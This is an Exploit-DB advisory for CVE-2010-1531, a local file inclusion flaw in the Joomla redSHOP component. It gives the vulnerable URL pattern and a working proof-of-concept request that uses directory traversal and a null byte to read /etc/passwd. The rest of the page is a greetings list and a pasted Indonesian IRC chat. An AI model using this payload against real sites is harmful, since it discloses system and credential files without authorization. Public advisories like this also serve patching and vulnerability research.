ad

Joomla Component redSHOP Local File Inclusion Vulnerability♦



EDB-ID: 12054 CVE: 2010-1531 OSVDB-ID: 63535
Author: NoGe Published: 2010-04-04 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
======================================================================================================================


  [o] Joomla Component redSHOP Local File Inclusion Vulnerability
 
       Software : com_redshop version 1.0.x [ commercial ]
       Vendor   : http://redcomponent.com/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com/
       Home     : http://antisecurity.org/


======================================================================================================================


  [o] Exploit

       http://localhost/[path]/index.php?option=com_redshop&view=[LFI]


  [o] PoC

       http://localhost/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00


======================================================================================================================


  [o] Greetz

       Vrs-hCk OoN_BoY Paman zxvf Angela Zhang aJe martfella pizzyroot
       H312Y yooogy mousekill }^-^{ noname matthews s4va stardustmemory
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


======================================================================================================================


  [o] Iklan Layanan Masyarakat

       -irc.******.net- *** Notice -- ander used SAJOIN to make wishnusakti join #channel
       <Jack> wew
       <Jack> ngapaen lu bedua di sini?
       <Jack> ck ck ck
       <@ander> kegiatan mafia
       <@wishnusakti> belajar broo ;))
       <@wishnusakti> nubi nih :(
       <Jack> sama dunk bro
       <Jack> aq ikut yak
       <Jack> mohon bimbingan na sesepuh
       <@wishnusakti> tuhh aku di ajarin ma ander-wear kok 
       <@wishnusakti> minta ma dia brooo 
       <Jack> ok bro
       <Jack> bro ander-wear.. ajarin dunk
       <@wishnusakti> jangan manggil gitu 
       <@wishnusakti> kamu di plorotin celananya nanti broo =))
       <Jack> jadi apa dong?
       <@wishnusakti> ander ku sayang :*
       <~zxvf> [06:27] * ~ander lagi dengerin [Akon - Right Now (Na Na Na)] © [nob0dy] <=- kayak nya lg senenQ dia
       <&pizzy> lagi kasmaran dia 
       <&NoGe> lg berbunga² tuh
       <zxvf> icic

       ouw ouw kamu ketauan... wkakwakwkakwkwakwak... :p


======================================================================================================================